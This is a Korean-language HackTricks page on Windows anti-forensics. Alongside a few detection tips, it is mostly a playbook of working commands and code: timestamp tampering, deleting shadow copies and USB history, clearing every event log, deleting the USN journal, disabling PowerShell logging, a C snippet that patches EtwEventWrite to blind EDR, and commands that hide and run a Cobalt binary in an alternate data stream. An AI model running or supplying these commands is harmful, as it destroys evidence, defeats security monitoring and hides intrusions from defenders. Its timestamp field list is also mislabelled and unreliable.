์•ˆํ‹ฐ ํฌ๋ Œ์‹ ๊ธฐ๋ฒ•

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

ํƒ€์ž„์Šคํƒฌํ”„

๊ณต๊ฒฉ์ž๋Š” ํŒŒ์ผ์˜ ํƒ€์ž„์Šคํƒฌํ”„๋ฅผ ๋ณ€๊ฒฝํ•˜์—ฌ ํƒ์ง€๋ฅผ ํ”ผํ•˜๊ณ ์ž ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
ํƒ€์ž„์Šคํƒฌํ”„๋Š” MFT์˜ $STANDARD_INFORMATION __ ๋ฐ __ $FILE_NAME ์†์„ฑ ๋‚ด์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋‘ ์†์„ฑ ๋ชจ๋‘ 4๊ฐœ์˜ ํƒ€์ž„์Šคํƒฌํ”„๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค: ์ˆ˜์ •, ์ ‘๊ทผ, ์ƒ์„ฑ, ๋ฐ MFT ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์ˆ˜์ • (MACE ๋˜๋Š” MACB).

Windows ํƒ์ƒ‰๊ธฐ ๋ฐ ๊ธฐํƒ€ ๋„๊ตฌ๋Š” **$STANDARD_INFORMATION**์˜ ์ •๋ณด๋ฅผ ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค.

TimeStomp - ์•ˆํ‹ฐ ํฌ๋ Œ์‹ ๋„๊ตฌ

์ด ๋„๊ตฌ๋Š” $STANDARD_INFORMATION ๋‚ด์˜ ํƒ€์ž„์Šคํƒฌํ”„ ์ •๋ณด๋ฅผ ์ˆ˜์ •ํ•˜์ง€๋งŒ $FILE_NAME ๋‚ด์˜ ์ •๋ณด๋Š” ์ˆ˜์ •ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ์˜์‹ฌ์Šค๋Ÿฌ์šด ํ™œ๋™์„ ์‹๋ณ„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Usnjrnl

USN ์ €๋„ (์—…๋ฐ์ดํŠธ ์‹œํ€€์Šค ๋ฒˆํ˜ธ ์ €๋„)์€ NTFS (Windows NT ํŒŒ์ผ ์‹œ์Šคํ…œ)์˜ ๊ธฐ๋Šฅ์œผ๋กœ, ๋ณผ๋ฅจ ๋ณ€๊ฒฝ ์‚ฌํ•ญ์„ ์ถ”์ ํ•ฉ๋‹ˆ๋‹ค. UsnJrnl2Csv ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ์ด๋Ÿฌํ•œ ๋ณ€๊ฒฝ ์‚ฌํ•ญ์„ ๊ฒ€์‚ฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด์ „ ์ด๋ฏธ์ง€๋Š” ๋„๊ตฌ๊ฐ€ ํ‘œ์‹œํ•œ ์ถœ๋ ฅ์œผ๋กœ, ํŒŒ์ผ์— ๋Œ€ํ•ด ์ผ๋ถ€ ๋ณ€๊ฒฝ์ด ์ˆ˜ํ–‰๋˜์—ˆ์Œ์„ ๊ด€์ฐฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

$LogFile

ํŒŒ์ผ ์‹œ์Šคํ…œ์— ๋Œ€ํ•œ ๋ชจ๋“  ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ๋ณ€๊ฒฝ ์‚ฌํ•ญ์€ write-ahead logging์ด๋ผ๋Š” ํ”„๋กœ์„ธ์Šค์— ๊ธฐ๋ก๋ฉ๋‹ˆ๋‹ค. ๊ธฐ๋ก๋œ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ๋Š” NTFS ํŒŒ์ผ ์‹œ์Šคํ…œ์˜ ๋ฃจํŠธ ๋””๋ ‰ํ† ๋ฆฌ์— ์œ„์น˜ํ•œ **$LogFile**์ด๋ผ๋Š” ํŒŒ์ผ์— ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. LogFileParser์™€ ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ด ํŒŒ์ผ์„ ํŒŒ์‹ฑํ•˜๊ณ  ๋ณ€๊ฒฝ ์‚ฌํ•ญ์„ ์‹๋ณ„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋‹ค์‹œ ๋งํ•ด, ๋„๊ตฌ์˜ ์ถœ๋ ฅ์—์„œ ์ผ๋ถ€ ๋ณ€๊ฒฝ์ด ์ˆ˜ํ–‰๋˜์—ˆ์Œ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํƒ€์ž„์Šคํƒฌํ”„๊ฐ€ ์ˆ˜์ •๋œ ์‹œ๊ฐ„์„ ์‹๋ณ„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

  • CTIME: ํŒŒ์ผ์˜ ์ƒ์„ฑ ์‹œ๊ฐ„
  • ATIME: ํŒŒ์ผ์˜ ์ˆ˜์ • ์‹œ๊ฐ„
  • MTIME: ํŒŒ์ผ์˜ MFT ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ์ˆ˜์ •
  • RTIME: ํŒŒ์ผ์˜ ์ ‘๊ทผ ์‹œ๊ฐ„

$STANDARD_INFORMATION ๋ฐ $FILE_NAME ๋น„๊ต

์˜์‹ฌ์Šค๋Ÿฌ์šด ์ˆ˜์ •๋œ ํŒŒ์ผ์„ ์‹๋ณ„ํ•˜๋Š” ๋˜ ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์€ ๋‘ ์†์„ฑ์˜ ์‹œ๊ฐ„์„ ๋น„๊ตํ•˜์—ฌ ๋ถˆ์ผ์น˜๋ฅผ ์ฐพ๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

๋‚˜๋…ธ์ดˆ

NTFS ํƒ€์ž„์Šคํƒฌํ”„๋Š” 100 ๋‚˜๋…ธ์ดˆ์˜ ์ •๋ฐ€๋„๋ฅผ ๊ฐ€์ง‘๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ 2010-10-10 10:10:**00.000:0000๊ณผ ๊ฐ™์€ ํƒ€์ž„์Šคํƒฌํ”„๋ฅผ ๊ฐ€์ง„ ํŒŒ์ผ์„ ์ฐพ๋Š” ๊ฒƒ์€ ๋งค์šฐ ์˜์‹ฌ์Šค๋Ÿฝ์Šต๋‹ˆ๋‹ค.

SetMace - ์•ˆํ‹ฐ ํฌ๋ Œ์‹ ๋„๊ตฌ

์ด ๋„๊ตฌ๋Š” $STARNDAR_INFORMATION ๋ฐ $FILE_NAME ๋‘ ์†์„ฑ์„ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ Windows Vista๋ถ€ํ„ฐ๋Š” ์ด ์ •๋ณด๋ฅผ ์ˆ˜์ •ํ•˜๊ธฐ ์œ„ํ•ด ๋ผ์ด๋ธŒ OS๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

๋ฐ์ดํ„ฐ ์ˆจ๊ธฐ๊ธฐ

NFTS๋Š” ํด๋Ÿฌ์Šคํ„ฐ์™€ ์ตœ์†Œ ์ •๋ณด ํฌ๊ธฐ๋ฅผ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ฆ‰, ํŒŒ์ผ์ด ํด๋Ÿฌ์Šคํ„ฐ์™€ ๋ฐ˜ ๊ฐœ๋ฅผ ์ฐจ์ง€ํ•˜๋ฉด, ๋‚จ์€ ๋ฐ˜์€ ํŒŒ์ผ์ด ์‚ญ์ œ๋  ๋•Œ๊นŒ์ง€ ์ ˆ๋Œ€ ์‚ฌ์šฉ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ์ด ์Šฌ๋ž™ ๊ณต๊ฐ„์— ๋ฐ์ดํ„ฐ๋ฅผ ์ˆจ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์Šฌ๋ž˜์ปค์™€ ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด ์ด โ€œ์ˆจ๊ฒจ์ง„โ€ ๊ณต๊ฐ„์— ๋ฐ์ดํ„ฐ๋ฅผ ์ˆจ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ $logfile ๋ฐ $usnjrnl ๋ถ„์„์„ ํ†ตํ•ด ์ผ๋ถ€ ๋ฐ์ดํ„ฐ๊ฐ€ ์ถ”๊ฐ€๋˜์—ˆ์Œ์„ ๋ณด์—ฌ์ค„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

๊ทธ๋Ÿฐ ๋‹ค์Œ FTK Imager์™€ ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์Šฌ๋ž™ ๊ณต๊ฐ„์„ ๋ณต๊ตฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ข…๋ฅ˜์˜ ๋„๊ตฌ๋Š” ๋‚ด์šฉ์„ ๋‚œ๋…ํ™”ํ•˜๊ฑฐ๋‚˜ ์‹ฌ์ง€์–ด ์•”ํ˜ธํ™”๋œ ์ƒํƒœ๋กœ ์ €์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

UsbKill

์ด ๋„๊ตฌ๋Š” USB ํฌํŠธ์—์„œ ๋ณ€๊ฒฝ ์‚ฌํ•ญ์ด ๊ฐ์ง€๋˜๋ฉด ์ปดํ“จํ„ฐ๋ฅผ ๋•๋‹ˆ๋‹ค.
์ด๋ฅผ ๋ฐœ๊ฒฌํ•˜๋Š” ๋ฐฉ๋ฒ•์€ ์‹คํ–‰ ์ค‘์ธ ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฒ€์‚ฌํ•˜๊ณ  ์‹คํ–‰ ์ค‘์ธ ๊ฐ ํŒŒ์ด์ฌ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๊ฒ€ํ† ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

๋ผ์ด๋ธŒ ๋ฆฌ๋ˆ…์Šค ๋ฐฐํฌํŒ

์ด ๋ฐฐํฌํŒ์€ RAM ๋ฉ”๋ชจ๋ฆฌ ๋‚ด์—์„œ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ๊ฐ์ง€ํ•˜๋Š” ์œ ์ผํ•œ ๋ฐฉ๋ฒ•์€ NTFS ํŒŒ์ผ ์‹œ์Šคํ…œ์ด ์“ฐ๊ธฐ ๊ถŒํ•œ์œผ๋กœ ๋งˆ์šดํŠธ๋œ ๊ฒฝ์šฐ์ž…๋‹ˆ๋‹ค. ์ฝ๊ธฐ ๊ถŒํ•œ๋งŒ์œผ๋กœ ๋งˆ์šดํŠธ๋˜๋ฉด ์นจ์ž…์„ ๊ฐ์ง€ํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

์•ˆ์ „ํ•œ ์‚ญ์ œ

https://github.com/Claudio-C/awesome-data-sanitization

Windows ๊ตฌ์„ฑ

์—ฌ๋Ÿฌ Windows ๋กœ๊น… ๋ฐฉ๋ฒ•์„ ๋น„ํ™œ์„ฑํ™”ํ•˜์—ฌ ํฌ๋ Œ์‹ ์กฐ์‚ฌ๋ฅผ ํ›จ์”ฌ ๋” ์–ด๋ ต๊ฒŒ ๋งŒ๋“ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

ํƒ€์ž„์Šคํƒฌํ”„ ๋น„ํ™œ์„ฑํ™” - UserAssist

์ด๊ฒƒ์€ ์‚ฌ์šฉ์ž๊ฐ€ ๊ฐ ์‹คํ–‰ ํŒŒ์ผ์„ ์‹คํ–‰ํ•œ ๋‚ ์งœ์™€ ์‹œ๊ฐ„์„ ์œ ์ง€ํ•˜๋Š” ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค์ž…๋‹ˆ๋‹ค.

UserAssist๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด ๋‘ ๋‹จ๊ณ„๋ฅผ ์ˆ˜ํ–‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค:

  1. ๋‘ ๊ฐœ์˜ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค, HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs ๋ฐ HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled๋ฅผ ๋ชจ๋‘ 0์œผ๋กœ ์„ค์ •ํ•˜์—ฌ UserAssist๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•˜๊ฒ ๋‹ค๋Š” ์‹ ํ˜ธ๋ฅผ ๋ณด๋ƒ…๋‹ˆ๋‹ค.
  2. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\<hash>์™€ ๊ฐ™์€ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ•˜์œ„ ํŠธ๋ฆฌ๋ฅผ ์ง€์›๋‹ˆ๋‹ค.

ํƒ€์ž„์Šคํƒฌํ”„ ๋น„ํ™œ์„ฑํ™” - Prefetch

์ด๊ฒƒ์€ Windows ์‹œ์Šคํ…œ์˜ ์„ฑ๋Šฅ์„ ํ–ฅ์ƒ์‹œํ‚ค๊ธฐ ์œ„ํ•ด ์‹คํ–‰๋œ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ์ด๊ฒƒ์€ ํฌ๋ Œ์‹ ๊ด€ํ–‰์—๋„ ์œ ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

  • regedit ์‹คํ–‰
  • ํŒŒ์ผ ๊ฒฝ๋กœ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters ์„ ํƒ
  • EnablePrefetcher ๋ฐ EnableSuperfetch๋ฅผ ๋งˆ์šฐ์Šค ์˜ค๋ฅธ์ชฝ ๋ฒ„ํŠผ์œผ๋กœ ํด๋ฆญ
  • ๊ฐ ๊ฐ’์„ 1(๋˜๋Š” 3)์—์„œ 0์œผ๋กœ ๋ณ€๊ฒฝํ•˜๊ธฐ ์œ„ํ•ด ์ˆ˜์ • ์„ ํƒ
  • ์žฌ๋ถ€ํŒ…

ํƒ€์ž„์Šคํƒฌํ”„ ๋น„ํ™œ์„ฑํ™” - ๋งˆ์ง€๋ง‰ ์ ‘๊ทผ ์‹œ๊ฐ„

NTFS ๋ณผ๋ฅจ์—์„œ ํด๋”๊ฐ€ ์—ด๋ฆด ๋•Œ๋งˆ๋‹ค ์‹œ์Šคํ…œ์€ ๊ฐ ๋‚˜์—ด๋œ ํด๋”์— ๋Œ€ํ•ด ํƒ€์ž„์Šคํƒฌํ”„ ํ•„๋“œ๋ฅผ ์—…๋ฐ์ดํŠธํ•˜๋Š” ๋ฐ ์‹œ๊ฐ„์„ ์†Œ์š”ํ•ฉ๋‹ˆ๋‹ค. ์ด๋ฅผ ๋งˆ์ง€๋ง‰ ์ ‘๊ทผ ์‹œ๊ฐ„์ด๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ๋Ÿ‰์ด ๋งŽ์€ NTFS ๋ณผ๋ฅจ์—์„œ๋Š” ์„ฑ๋Šฅ์— ์˜ํ–ฅ์„ ์ค„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

  1. ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํŽธ์ง‘๊ธฐ(Regedit.exe)๋ฅผ ์—ฝ๋‹ˆ๋‹ค.
  2. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem์œผ๋กœ ์ด๋™ํ•ฉ๋‹ˆ๋‹ค.
  3. NtfsDisableLastAccessUpdate๋ฅผ ์ฐพ์Šต๋‹ˆ๋‹ค. ์กด์žฌํ•˜์ง€ ์•Š์œผ๋ฉด ์ด DWORD๋ฅผ ์ถ”๊ฐ€ํ•˜๊ณ  ๊ฐ’์„ 1๋กœ ์„ค์ •ํ•˜์—ฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•ฉ๋‹ˆ๋‹ค.
  4. ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํŽธ์ง‘๊ธฐ๋ฅผ ๋‹ซ๊ณ  ์„œ๋ฒ„๋ฅผ ์žฌ๋ถ€ํŒ…ํ•ฉ๋‹ˆ๋‹ค.

USB ๊ธฐ๋ก ์‚ญ์ œ

๋ชจ๋“  USB ์žฅ์น˜ ํ•ญ๋ชฉ์€ USB ์žฅ์น˜๋ฅผ PC ๋˜๋Š” ๋…ธํŠธ๋ถ์— ์—ฐ๊ฒฐํ•  ๋•Œ ์ƒ์„ฑ๋˜๋Š” ํ•˜์œ„ ํ‚ค๋ฅผ ํฌํ•จํ•˜๋Š” USBSTOR ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค์— ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. ์ด ํ‚ค๋Š” ์—ฌ๊ธฐ์—์„œ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR. ์ด๊ฒƒ์„ ์‚ญ์ œํ•˜๋ฉด USB ๊ธฐ๋ก์ด ์‚ญ์ œ๋ฉ๋‹ˆ๋‹ค.
๋˜ํ•œ USBDeview ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์‚ญ์ œ๋˜์—ˆ๋Š”์ง€ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค (๊ทธ๋ฆฌ๊ณ  ์‚ญ์ œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค).

USB์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์ €์žฅํ•˜๋Š” ๋˜ ๋‹ค๋ฅธ ํŒŒ์ผ์€ C:\Windows\INF ๋‚ด์˜ setupapi.dev.log ํŒŒ์ผ์ž…๋‹ˆ๋‹ค. ์ด๊ฒƒ๋„ ์‚ญ์ œํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

์„€๋„์šฐ ๋ณต์‚ฌ ๋น„ํ™œ์„ฑํ™”

์„€๋„์šฐ ๋ณต์‚ฌ ๋ชฉ๋ก์„ ๋ณด๋ ค๋ฉด vssadmin list shadowstorage ์‹คํ–‰
์‚ญ์ œํ•˜๋ ค๋ฉด vssadmin delete shadow ์‹คํ–‰

GUI๋ฅผ ํ†ตํ•ด ์‚ญ์ œํ•˜๋ ค๋ฉด https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html์—์„œ ์ œ์•ˆ๋œ ๋‹จ๊ณ„๋ฅผ ๋”ฐ๋ฅด์‹ญ์‹œ์˜ค.

์„€๋„์šฐ ๋ณต์‚ฌ๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•˜๋ ค๋ฉด ์—ฌ๊ธฐ์—์„œ ๋‹จ๊ณ„:

  1. Windows ์‹œ์ž‘ ๋ฒ„ํŠผ์„ ํด๋ฆญํ•œ ํ›„ ํ…์ŠคํŠธ ๊ฒ€์ƒ‰ ์ƒ์ž์— โ€œservicesโ€œ๋ฅผ ์ž…๋ ฅํ•˜์—ฌ ์„œ๋น„์Šค ํ”„๋กœ๊ทธ๋žจ์„ ์—ฝ๋‹ˆ๋‹ค.
  2. ๋ชฉ๋ก์—์„œ โ€œVolume Shadow Copyโ€œ๋ฅผ ์ฐพ์•„ ์„ ํƒํ•œ ํ›„ ๋งˆ์šฐ์Šค ์˜ค๋ฅธ์ชฝ ๋ฒ„ํŠผ์„ ํด๋ฆญํ•˜์—ฌ ์†์„ฑ์— ์ ‘๊ทผํ•ฉ๋‹ˆ๋‹ค.
  3. โ€œ์‹œ์ž‘ ์œ ํ˜•โ€ ๋“œ๋กญ๋‹ค์šด ๋ฉ”๋‰ด์—์„œ ๋น„ํ™œ์„ฑํ™”๋ฅผ ์„ ํƒํ•˜๊ณ  ๋ณ€๊ฒฝ ์‚ฌํ•ญ์„ ์ ์šฉํ•˜๊ณ  ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.

์–ด๋–ค ํŒŒ์ผ์ด ์„€๋„์šฐ ๋ณต์‚ฌ์— ๋ณต์‚ฌ๋ ์ง€๋ฅผ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot์—์„œ ์ˆ˜์ •ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

์‚ญ์ œ๋œ ํŒŒ์ผ ๋ฎ์–ด์“ฐ๊ธฐ

  • Windows ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: cipher /w:C ์ด๋Š” C ๋“œ๋ผ์ด๋ธŒ ๋‚ด์˜ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ๋ฏธ์‚ฌ์šฉ ๋””์Šคํฌ ๊ณต๊ฐ„์—์„œ ๋ฐ์ดํ„ฐ๋ฅผ ์ œ๊ฑฐํ•˜๋„๋ก ์ง€์‹œํ•ฉ๋‹ˆ๋‹ค.
  • Eraser์™€ ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค.

Windows ์ด๋ฒคํŠธ ๋กœ๊ทธ ์‚ญ์ œ

  • Windows + R โ€“> eventvwr.msc โ€“> โ€œWindows ๋กœ๊ทธโ€ ํ™•์žฅ โ€“> ๊ฐ ์นดํ…Œ๊ณ ๋ฆฌ๋ฅผ ๋งˆ์šฐ์Šค ์˜ค๋ฅธ์ชฝ ๋ฒ„ํŠผ์œผ๋กœ ํด๋ฆญํ•˜๊ณ  โ€œ๋กœ๊ทธ ์ง€์šฐ๊ธฐโ€ ์„ ํƒ
  • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
  • Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

Windows ์ด๋ฒคํŠธ ๋กœ๊ทธ ๋น„ํ™œ์„ฑํ™”

  • reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\eventlog' /v Start /t REG_DWORD /d 4 /f
  • ์„œ๋น„์Šค ์„น์…˜ ๋‚ด์—์„œ โ€œWindows ์ด๋ฒคํŠธ ๋กœ๊ทธโ€ ์„œ๋น„์Šค๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•ฉ๋‹ˆ๋‹ค.
  • WEvtUtil.exec clear-log ๋˜๋Š” WEvtUtil.exe cl

$UsnJrnl ๋น„ํ™œ์„ฑํ™”

  • fsutil usn deletejournal /d c:

๊ณ ๊ธ‰ ๋กœ๊น… ๋ฐ ์ถ”์  ๋ณ€์กฐ (2023-2025)

PowerShell ScriptBlock/Module ๋กœ๊น…

์ตœ๊ทผ ๋ฒ„์ „์˜ Windows 10/11 ๋ฐ Windows Server๋Š” Microsoft-Windows-PowerShell/Operational (์ด๋ฒคํŠธ 4104/4105/4106) ์•„๋ž˜์— ํ’๋ถ€ํ•œ PowerShell ํฌ๋ Œ์‹ ์•„ํ‹ฐํŒฉํŠธ๋ฅผ ๋ณด๊ด€ํ•ฉ๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ์ด๋ฅผ ์‹ค์‹œ๊ฐ„์œผ๋กœ ๋น„ํ™œ์„ฑํ™”ํ•˜๊ฑฐ๋‚˜ ์‚ญ์ œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

# Turn OFF ScriptBlock & Module logging (registry persistence)
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine" \
-Name EnableScriptBlockLogging -Value 0 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging" \
-Name EnableModuleLogging -Value 0 -PropertyType DWord -Force

# In-memory wipe of recent PowerShell logs
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
Remove-WinEvent               # requires admin & Win11 23H2+

์ˆ˜๋น„์ž๋Š” ํ•ด๋‹น ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ ํ‚ค์˜ ๋ณ€๊ฒฝ ์‚ฌํ•ญ๊ณผ PowerShell ์ด๋ฒคํŠธ์˜ ๋Œ€๋Ÿ‰ ์ œ๊ฑฐ๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

ETW (Windows ์ด๋ฒคํŠธ ์ถ”์ ) ํŒจ์น˜

์—”๋“œํฌ์ธํŠธ ๋ณด์•ˆ ์ œํ’ˆ์€ ETW์— ํฌ๊ฒŒ ์˜์กดํ•ฉ๋‹ˆ๋‹ค. 2024๋…„์˜ ์ธ๊ธฐ ์žˆ๋Š” ํšŒํ”ผ ๋ฐฉ๋ฒ•์€ ๋ฉ”๋ชจ๋ฆฌ์—์„œ ntdll!EtwEventWrite/EtwEventWriteFull์„ ํŒจ์น˜ํ•˜์—ฌ ๋ชจ๋“  ETW ํ˜ธ์ถœ์ด ์ด๋ฒคํŠธ๋ฅผ ๋ฐœ์ƒ์‹œํ‚ค์ง€ ์•Š๊ณ  STATUS_SUCCESS๋ฅผ ๋ฐ˜ํ™˜ํ•˜๋„๋ก ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

// 0xC3 = RET on x64
unsigned char patch[1] = { 0xC3 };
WriteProcessMemory(GetCurrentProcess(),
GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite"),
patch, sizeof(patch), NULL);

Public PoCs (์˜ˆ: EtwTiSwallow)๋Š” PowerShell ๋˜๋Š” C++์—์„œ ๋™์ผํ•œ ํ”„๋ฆฌ๋ฏธํ‹ฐ๋ธŒ๋ฅผ ๊ตฌํ˜„ํ•ฉ๋‹ˆ๋‹ค.
ํŒจ์น˜๊ฐ€ ํ”„๋กœ์„ธ์Šค-๋กœ์ปฌ์ด๊ธฐ ๋•Œ๋ฌธ์— ๋‹ค๋ฅธ ํ”„๋กœ์„ธ์Šค์—์„œ ์‹คํ–‰๋˜๋Š” EDR์€ ์ด๋ฅผ ๋†“์น  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
ํƒ์ง€: ๋ฉ”๋ชจ๋ฆฌ์˜ ntdll๊ณผ ๋””์Šคํฌ์˜ ntdll์„ ๋น„๊ตํ•˜๊ฑฐ๋‚˜ ์‚ฌ์šฉ์ž ๋ชจ๋“œ ์ด์ „์— ํ›„ํ‚นํ•ฉ๋‹ˆ๋‹ค.

๋Œ€์ฒด ๋ฐ์ดํ„ฐ ์ŠคํŠธ๋ฆผ (ADS) ๋ถ€ํ™œ

2023๋…„์˜ ์•…์„ฑ์ฝ”๋“œ ์บ ํŽ˜์ธ(์˜ˆ: FIN12 ๋กœ๋”)์€ ์ „ํ†ต์ ์ธ ์Šค์บ๋„ˆ์˜ ์‹œ์•ผ์—์„œ ๋ฒ—์–ด๋‚˜๊ธฐ ์œ„ํ•ด ADS ๋‚ด๋ถ€์— 2๋‹จ๊ณ„ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฅผ ์Šคํ…Œ์ด์ง•ํ•˜๋Š” ๊ฒƒ์ด ๊ด€์ฐฐ๋˜์—ˆ์Šต๋‹ˆ๋‹ค:

rem Hide cobalt.bin inside an ADS of a PDF
type cobalt.bin > report.pdf:win32res.dll
rem Execute directly
wmic process call create "cmd /c report.pdf:win32res.dll"

